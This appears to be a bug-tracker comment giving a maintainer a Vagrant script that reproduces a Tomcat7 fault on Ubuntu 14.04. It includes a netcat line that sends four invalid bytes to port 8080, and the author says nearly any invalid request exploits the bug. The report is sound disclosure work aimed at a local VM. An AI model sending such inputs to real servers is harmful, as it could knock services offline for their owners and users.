Comment 4 for bug 1663318

Hi Seth,

If you can install VirtualBox and Vagrant then the following script should reproduce the problem:

mkdir ubuntu-14.04-vagrant; \
cd ubuntu-14.04-vagrant; \
vagrant init ubuntu/trusty64; \
vagrant box update; \
vagrant up --provider virtualbox; \
vagrant ssh -c "sudo apt-get update; sudo apt-get -y dist-upgrade; sudo reboot"; \
sleep 30s; \
vagrant ssh -c "sudo apt-get -y install tomcat7; lsb_release -a; sudo service tomcat7 restart"; \
vagrant ssh -c "top -bn2 | awk '/^top/{i++}i>1' | head"; \
vagrant ssh -c "printf '\x05\x02\x00\x02' | nc -w 5 localhost 8080; top -bn2 | awk '/^top/{i++}i>1' | head"; \
vagrant ssh -c "sleep 5m; top -bn2 | awk '/^top/{i++}i>1' | head"; \
vagrant halt

I'm attaching the output of my terminal just in case.

BTW, in preparing this I've noticed I made an incorrect use of printf in my initial report, I meant to send 05 02 00 02 in binary (as it appears in my pcap file), not literally "\0x05\0x02\0x00\0x02" (without quotes). Seems that this exact payload is not required to exploit the bug then, probably any invalid request will do.

Thanks for taking a look into my report.